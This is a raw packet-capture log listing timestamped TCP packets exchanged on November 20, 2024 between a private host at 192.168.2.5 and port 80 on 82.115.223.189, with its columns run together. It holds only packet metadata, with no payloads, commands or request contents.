                                          Nov 20, 2024 07:48:02.610099077 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.653318882 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.653353930 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.653371096 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.653384924 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.653410912 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.653424978 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.653438091 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.653450966 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.653467894 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.653484106 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.653491020 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.653497934 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.653515100 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.653526068 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.653543949 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.653562069 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.653585911 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.653599977 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.653614998 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.653629065 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.653644085 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.653650045 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.653650045 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.653666973 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.653687954 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.653691053 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.653702974 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.653716087 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.653719902 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.653734922 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.653750896 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.653755903 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.653769016 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.653786898 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.653815031 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.653829098 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.654025078 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654042006 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654057026 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654071093 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654087067 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654088020 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.654102087 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654108047 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.654118061 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654133081 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654148102 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654155970 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654160023 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.654172897 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654186010 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.654186010 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.654190063 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654206991 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654220104 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654236078 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654247999 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.654247999 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.654277086 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.654474974 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654499054 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654515028 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654530048 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654545069 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654550076 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.654560089 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654573917 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.654575109 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654589891 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654604912 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654614925 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.654618979 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654633999 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654638052 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.654650927 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654659033 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.654669046 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654684067 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654699087 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654710054 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.654715061 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654727936 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.654730082 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654745102 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654761076 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654800892 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.654800892 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.654830933 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654886007 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654895067 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.654901028 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654916048 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.654949903 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.655123949 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655138969 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655153990 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655168056 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655173063 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.655183077 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655195951 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.655198097 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655215025 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655229092 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655232906 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.655253887 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655270100 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655286074 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655297995 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.655301094 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655328989 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655328989 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.655344009 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655359030 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655360937 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.655375004 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655380964 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.655390024 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655402899 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.655405998 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655421972 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655436993 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655440092 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.655452013 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655458927 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.655467033 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655481100 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655494928 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655497074 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.655509949 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655525923 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655533075 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.655540943 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655551910 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.655558109 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655584097 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.655812025 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655827999 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655843019 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655857086 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655863047 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.655872107 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655885935 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655901909 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655925989 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.655925989 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.655931950 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655946970 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655949116 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.655961990 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655977964 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655992985 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.655996084 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.656008005 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.656017065 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.656033039 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.656047106 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.656066895 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.656097889 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.656158924 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.656174898 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.656228065 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.656698942 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.696981907 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.697005987 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.697033882 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.697051048 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.697067022 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.697071075 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.697082996 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.697098970 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.697113037 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.697115898 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.697133064 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.697160959 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.745227098 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.745337009 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.745372057 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.745407104 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.745440006 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.745474100 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.745508909 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.745547056 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.745584011 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.745693922 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.745707035 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.745728016 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.745762110 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.745795012 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.745827913 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.745846987 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.745862961 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.745894909 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.745909929 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.745925903 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.745927095 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.745959044 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.745978117 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.745995045 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.746028900 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.746037960 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.746190071 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.746243000 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.746249914 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.746277094 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.746311903 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.746347904 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.746349096 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.746402025 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.746402979 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.746438980 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.746490955 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.746511936 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.746525049 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.746557951 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.746593952 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.746606112 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.746627092 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.746639967 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.746663094 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.746697903 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.746715069 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.746731043 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.746762991 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.746777058 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.746794939 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.746833086 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.746850014 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.746865988 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.746917009 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.746918917 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.746951103 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.746984005 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.747000933 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.747018099 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.747050047 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.747081041 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.747082949 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.747117043 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.747132063 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.747150898 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.747184038 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.747200012 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.747219086 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.747252941 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.747266054 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.747287035 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.747343063 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.747345924 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.747379065 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.747427940 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.747436047 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.747471094 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.747502089 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.747523069 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.747538090 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.747570992 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.747602940 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.747625113 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.747677088 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.747697115 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.747710943 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.747750998 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.747766018 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.747786045 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.747824907 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.747855902 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.747859001 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.747893095 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.747912884 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.747926950 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.747961044 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.747980118 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.747993946 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.748028994 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.748044014 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.748063087 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.748095989 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.748111963 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.748128891 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.748162031 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.748184919 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.748197079 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.748230934 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.748238087 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.748264074 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.748292923 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.748318911 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.748327017 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.748363018 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.748378038 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.748397112 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.748431921 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.748451948 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.748465061 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.748498917 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.748512030 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.748533964 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.748568058 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.748584986 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.748600960 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.748634100 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.748650074 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.748668909 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.748703003 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.748714924 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.748737097 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.748770952 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.748796940 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.748805046 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.748840094 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.748857021 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.748872995 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.748909950 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.748922110 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.748943090 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.748975992 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.748991966 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.749011040 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.749043941 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.749066114 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.749066114 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.749077082 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.749111891 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.749128103 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.749145031 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.749177933 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.749205112 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.749212027 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.749285936 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.750551939 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.787765980 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.787858963 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.787895918 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.787930965 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.787960052 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.787966013 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.787987947 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.788001060 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.788033962 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.788048029 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.788070917 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.788122892 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.836194038 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.836239100 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.836297989 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.836350918 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.836353064 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.836406946 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.836421013 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.836462975 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.836498022 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.836534023 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.836534977 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.836585045 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.836592913 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.836646080 CET804970482.115.223.189192.168.2.5
